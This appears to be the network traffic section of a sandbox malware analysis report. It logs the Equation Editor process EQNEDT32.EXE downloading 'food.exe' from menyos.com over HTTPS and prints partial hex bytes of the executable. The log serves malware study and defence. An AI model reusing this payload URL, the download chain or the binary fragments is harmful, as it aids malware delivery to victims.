Oct 1, 2024 07:44:59.773017883 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.773041010 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.773053885 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.773140907 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.773183107 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.773184061 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.773192883 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.773221016 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.773416042 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.773454905 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.773458004 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.773468018 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.773497105 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.773710012 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.773753881 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.773758888 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.773763895 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.773794889 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.773952007 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.773962975 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.774004936 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.774008036 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.774017096 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.774044037 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.774058104 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.774230003 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.774270058 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.774275064 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.774279118 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.774311066 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.777509928 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860002041 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860061884 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860162973 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860182047 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860209942 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860235929 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860311985 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860321045 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860352039 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860367060 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860371113 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860404968 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860414982 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860434055 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860472918 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860485077 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860488892 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860526085 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860541105 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860630035 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860671043 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860678911 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860682964 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860716105 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860729933 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860907078 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860946894 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.860975027 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.860979080 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.861008883 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.861021996 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.861255884 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.861296892 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.861330986 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.861335039 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.861358881 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.861371994 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.861372948 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.861382961 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.861419916 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.861427069 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.861437082 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.861479044 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.861489058 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.861649036 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.861689091 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.861727953 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.861731052 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.861795902 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.865432978 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.947124004 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947173119 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947248936 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947288990 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947309017 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.947339058 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947364092 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.947364092 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.947376966 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947415113 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.947418928 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947429895 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.947434902 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947474957 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.947556019 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947596073 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947608948 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.947613001 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947637081 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.947652102 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.947742939 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947784901 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947793961 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.947798967 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.947830915 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.948079109 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.948120117 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.948129892 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.948138952 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.948163033 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.948175907 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.948374987 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.948415041 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.948422909 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.948431015 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.948457003 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.948471069 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.948532104 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.948604107 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.948642969 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.948653936 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.948657990 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.948684931 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.948700905 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.953864098 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.034140110 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034192085 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034209967 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.034228086 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034246922 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.034279108 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034324884 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034332991 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.034339905 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034384012 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.034413099 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.034456968 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034502983 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034522057 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.034526110 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034553051 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.034575939 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.034674883 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034718990 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034745932 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.034749031 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034761906 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.034782887 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.034936905 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034976959 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.034977913 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.034986973 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.035017967 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.035058975 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.035100937 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.035104036 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.035110950 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.035147905 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.035156012 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.035197973 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.035202980 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.035224915 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:45:00.035243034 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.035264969 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.035686970 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.041435957 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:45:00.041445971 CEST	443	49163	104.21.35.109	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 07:44:58.341020107 CEST	54562	53	192.168.2.22	8.8.8.8
Oct 1, 2024 07:44:58.378442049 CEST	53	54562	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2024 07:44:58.341020107 CEST	192.168.2.22	8.8.8.8	0x96c8	Standard query (0)	menyos.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 1, 2024 07:44:58.378442049 CEST	8.8.8.8	192.168.2.22	0x96c8	No error (0)	menyos.com		104.21.35.109	A (IP address)	IN (0x0001)	false
Oct 1, 2024 07:44:58.378442049 CEST	8.8.8.8	192.168.2.22	0x96c8	No error (0)	menyos.com		172.67.218.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

menyos.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	104.21.35.109	443	3516	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
2024-10-01 05:44:58 UTC	324	OUT	GET /assets/home/js/bdg/food.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: menyos.com Connection: Keep-Alive
2024-10-01 05:44:59 UTC	799	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:44:59 GMT Content-Type: application/octet-stream Content-Length: 1179411 Connection: close Last-Modified: Mon, 30 Sep 2024 03:47:25 GMT ETag: "66fa1f4d-11ff13" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 X-Cache: HIT from Backend X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 745 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xYqczok4mhQ7gXKIZdI9epKMYb8SpXOSoQoJJfeoE6FOvvKaSEts14bnv0%2Bdi0Xz1fKqMIujjz4Wac6cbYf1NqCKlmZ%2B7ks5pMjOuiC5pTLumxvtK0G5u%2BuFS%2FtR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cba24d8d9e441c1-EWR
2024-10-01 05:44:59 UTC	570	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 82 c1 ed 69 e3 af be 69 e3 af be 69 e3 af be d4 ac 39 be 6b e3 af be 60 9b 3a be 77 e3 af be 60 9b 2c be db e3 af be 60 9b 2b be 50 e3 af be 4e 25 c2 be 63 e3 af be 4e 25 d4 be 48 e3 af be 69 e3 ae be 64 e1 af be 60 9b 20 be 2f e3 af be 77 b1 3a be 6b e3 af be 77 b1 3b be 68 e3 af be 69 e3 38 be 68 e3 af be 60 9b 3e be 68 e3 af be 52 69 63 68 69 e3 af be 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-iii9k`:w`,`+PN%cN%Hid` /w:kw;hi8h`>hRichi
2024-10-01 05:44:59 UTC	1369	IN	Data Raw: 00 00 00 20 08 00 00 da 00 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a5 01 00 00 00 09 00 00 68 00 00 00 e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 b2 01 00 00 b0 0a 00 00 b4 01 00 00 48 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @@.datah@.rsrcH@@
2024-10-01 05:44:59 UTC	1369	IN	Data Raw: 00 01 00 00 00 89 46 0c c3 cc cc cc cc 56 8b f1 40 33 c9 89 46 08 ba 02 00 00 00 f7 e2 0f 90 c1 c7 46 04 00 00 00 00 f7 d9 0b c8 51 e8 56 03 01 00 33 c9 89 06 83 c4 04 66 89 08 e8 ad ff ff ff 8b c6 5e c3 cc cc cc cc cc cc cc cc cc 8b 06 85 c0 74 09 50 e8 03 ff 00 00 83 c4 04 57 8d be ec 00 00 00 e8 65 ff ff ff 8d 8e bc 00 00 00 e8 1a 12 00 00 8d 8e ac 00 00 00 e8 0f 12 00 00 8d 8e 9c 00 00 00 e8 04 12 00 00 8d 8e 8c 00 00 00 e8 f9 11 00 00 8d 7e 08 e8 71 f0 00 00 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 81 ec 14 02 00 00 e8 85 13 00 00 84 c0 0f 84 6e ae 02 00 e8 98 00 00 00 85 c0 0f 85 61 ae 02 00 e8 6b c1 00 00 85 c0 0f 85 54 ae 02 00 8b 94 24 18 02 00 00 8d 04 24 50 8d 4c 24 08 51 68 04 01 00 00 52 ff 15 20 23 48 00 8d 44 24 04 50 b8 e8 7f 4a Data Ascii: FV@3FFQV3f^tPWe~q_nakT$$PL$QhR #HD$PJ
2024-10-01 05:44:59 UTC	1369	IN	Data Raw: 00 3b df 0f 84 8f fc ff ff e9 0f 98 02 00 8b 4a 04 66 83 79 08 7f 0f 85 41 97 02 00 8b 5c 24 14 ff 4c 24 24 4b 8d 44 24 78 89 5c 24 14 e8 52 f1 00 00 84 c0 0f 85 52 95 02 00 8d 44 24 78 e8 31 f1 00 00 8b 38 8d 74 24 78 e8 16 a9 00 00 83 7c 24 24 00 0f 8c d0 97 02 00 3b df 0f 84 37 fc ff ff e9 c3 97 02 00 8b ff 58 b0 42 00 a8 af 42 00 b6 af 42 00 8d 18 40 00 fa 18 40 00 5c 18 40 00 b0 18 40 00 0a b0 42 00 10 ae 42 00 4e af 42 00 80 ae 42 00 47 ae 42 00 e7 ae 42 00 36 18 40 00 26 16 40 00 84 15 40 00 00 01 02 0f 03 04 05 06 0f 0f 0f 0f 0f 07 07 08 09 0a 0b 0c 0f 0f 0f 0f 0f 0f 0f 0d 0e cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8d 4e 24 e8 58 0c 00 00 8d 4e 14 e8 50 0c 00 00 8d 4e 04 e9 48 0c 00 00 cc cc cc cc cc cc cc cc 57 85 c0 75 1e 39 05 dc 7c 4a 00 Data Ascii: ;JfyA\$L$$KD$x\$RRD$x18t$x\|$$;7XBBB@@\@@BBNBBGBB6@&@@N$XNPNHWu9\|J
2024-10-01 05:44:59 UTC	1369	IN	Data Raw: 00 8d 4d 9c e8 d2 07 00 00 8d b5 60 fe ff ff e8 87 f5 ff ff 8d b5 44 fe ff ff c7 06 70 a0 48 00 e8 a6 e9 00 00 8b 46 04 50 e8 7c f4 00 00 83 c4 04 8d 9d 3c fd ff ff e8 4f f4 ff ff 8d 8d 2c fd ff ff e8 94 07 00 00 8d b5 1c fd ff ff e8 29 74 00 00 8d b5 0c fd ff ff c7 06 70 a0 48 00 e8 68 e9 00 00 8b 4e 04 51 e8 3e f4 00 00 8d b5 fc fc ff ff 83 c4 04 c7 06 70 a0 48 00 e8 4b e9 00 00 8b 56 04 52 e8 21 f4 00 00 8d b5 ec fc ff ff 83 c4 04 c7 06 70 a0 48 00 e8 2e e9 00 00 8b 46 04 50 e8 04 f4 00 00 8d b5 dc fc ff ff 83 c4 04 c7 06 70 a0 48 00 e8 11 e9 00 00 8b 4e 04 51 e8 e7 f3 00 00 83 c4 04 8d 85 d0 fc ff ff e8 aa e9 00 00 8d 85 c0 fc ff ff e8 6f e9 00 00 8d 8d b0 fc ff ff e8 f4 06 00 00 8d 85 98 fc ff ff e8 29 e9 00 00 8d b5 8c fc ff ff e8 6e c7 00 00 8d b5 Data Ascii: M`DpHFP\|<O,)tpHhNQ>pHKVR!pH.FPpHNQo)n
2024-10-01 05:44:59 UTC	1369	IN	Data Raw: 00 51 57 8b ce e8 a8 87 00 00 85 c0 0f 85 46 d5 02 00 8d 44 24 18 50 e8 56 6e 00 00 8b 4f 04 8b 94 24 84 00 00 00 8b 04 91 66 83 78 08 00 0f 85 14 d5 02 00 83 38 0f 0f 85 0b d5 02 00 ff 84 24 84 00 00 00 6a ff 8d 44 24 1c 50 8d 8c 24 8c 00 00 00 51 57 8b ce e8 57 87 00 00 85 c0 0f 85 f5 d4 02 00 8d 44 24 18 50 8d 5c 24 5c e8 01 6e 00 00 8b 4f 04 8b 94 24 84 00 00 00 8b 04 91 66 83 78 08 00 0f 84 fa d2 02 00 8d 74 24 68 e8 90 6e 00 00 8b 74 24 7c b8 01 00 00 00 89 44 24 70 89 44 24 68 8b 44 24 10 83 78 08 04 0f 84 14 d3 02 00 8b 5c 24 60 83 fb 04 0f 84 12 d3 02 00 8b 57 04 8b 84 24 84 00 00 00 8b 04 82 66 83 78 08 7f 0f 85 0d d3 02 00 33 f6 32 d2 eb 06 8d 9b 00 00 00 00 8b 45 00 8d 48 01 89 4d 00 3b 05 90 8e 4a 00 7f 40 85 c0 7e 3c c1 e0 04 03 05 c4 8e 4a Data Ascii: QWFD$PVnO$fx8$jD$P$QWWD$P\$\nO$fxt$hnt$\|D$pD$hD$x\$`W$fx32EHM;J@~<J
2024-10-01 05:44:59 UTC	1369	IN	Data Raw: 8d 54 24 10 52 8d 0c 07 51 e8 9b fd ff ff 46 83 c7 10 eb b7 8d 5c 24 10 c7 44 24 10 34 52 48 00 e8 c4 a8 00 00 8b 54 24 14 52 e8 c9 e9 00 00 83 c4 04 b0 01 5f 5e 5d 5b 83 c4 14 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc b8 28 20 00 00 e8 c6 28 02 00 53 55 56 8b d9 57 8d 7b 14 89 7c 24 1c e8 d4 f0 ff ff 8b 84 24 3c 20 00 00 33 ed 89 2b 83 c3 04 50 8b c3 e8 6e f8 ff ff 89 6c 24 14 c6 44 24 12 00 89 6c 24 18 c6 44 24 13 00 8b fd 8b f3 e8 63 f3 ff ff 0f b7 00 66 83 f8 20 0f 84 1d 7c 02 00 66 83 f8 09 0f 84 13 7c 02 00 8b c3 e8 35 01 00 00 8b 43 04 3b e8 0f 83 ba 00 00 00 8b 0b 8d 04 69 0f b7 00 8b 4c 24 14 66 85 c0 0f 84 c1 00 00 00 45 81 f9 00 10 00 00 0f 8d b4 00 00 00 66 83 f8 20 74 39 66 83 f8 09 74 33 66 83 f8 22 74 0c 66 89 44 4c 30 41 89 4c 24 14 eb ae Data Ascii: T$RQF\$D$4RHT$R_^][( (SUVW{\|$$< 3+Pnl$D$l$D$cf \|f\|5C;iL$fEf t9ft3f"tfDL0AL$
2024-10-01 05:44:59 UTC	1369	IN	Data Raw: 56 e8 99 e4 00 00 8b 44 24 40 83 c4 04 47 3b 78 08 72 d5 8b 54 24 3c 89 6a 08 66 39 2b 0f 84 fc 01 00 00 eb 0b 8d a4 24 00 00 00 00 8d 64 24 00 0f b7 04 6b 66 83 f8 20 0f 84 f7 00 00 00 66 83 f8 09 0f 84 ed 00 00 00 0f b7 04 6b 66 85 c0 0f 84 b5 01 00 00 0f b7 f0 89 6c 24 10 66 89 6c 24 1e 66 83 fe 30 0f 83 d0 00 00 00 66 83 fe 2e 0f 84 d0 00 00 00 66 83 fe 41 0f 83 2a 02 00 00 66 83 fe 61 0f 83 8a 04 00 00 66 83 fe 5f 0f 84 20 02 00 00 0f b7 c6 83 f8 24 0f 84 cf 01 00 00 83 f8 3d 0f 84 42 02 00 00 83 f8 28 0f 84 76 02 00 00 83 f8 29 0f 84 4f 02 00 00 83 f8 22 0f 84 82 02 00 00 83 e8 1a 83 f8 44 0f 87 26 87 02 00 0f b6 88 28 34 40 00 ff 24 8d ec 33 40 00 66 83 f8 30 0f 8c 19 ff ff ff 8b 0e 85 c9 0f 84 0f ff ff ff 8b 41 0c ff 08 8b 51 0c 89 4c 24 10 39 2a Data Ascii: VD$@G;xrT$<jf9+$d$kf fkfl$fl$f0f.fAfaf_ $=B(v)O"D&(4@$3@f0AQL$9
2024-10-01 05:44:59 UTC	1369	IN	Data Raw: 0f 84 9e 81 02 00 83 e8 01 0f 84 85 81 02 00 bf 43 00 00 00 e8 3e f7 ff ff 8d 54 24 14 52 e9 7a fc ff ff 45 66 83 3c 6b 3d 8d 74 24 14 0f 84 81 81 02 00 bf 42 00 00 00 e8 1a f7 ff ff e9 56 fc ff ff 90 6d b5 42 00 db 31 40 00 95 31 40 00 1b 32 40 00 fb 31 40 00 67 2f 40 00 cd b4 42 00 49 32 40 00 9c 33 40 00 cc 33 40 00 db 32 40 00 9f 32 40 00 bd 32 40 00 0b b5 42 00 45 b6 42 00 00 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 01 02 0e 0e 03 04 05 06 0e 07 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 08 0e 09 0e 0a 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0b 0e 0c 0d cc cc cc 56 8b f0 8b 46 0c 83 38 01 0f 8f 91 70 02 00 8b 46 04 40 e8 28 00 00 00 8b 46 04 8b 0e 66 8b 54 24 08 66 89 14 41 ff 46 04 8b 46 04 8b 0e 33 d2 66 89 14 41 8b c6 5e c2 Data Ascii: 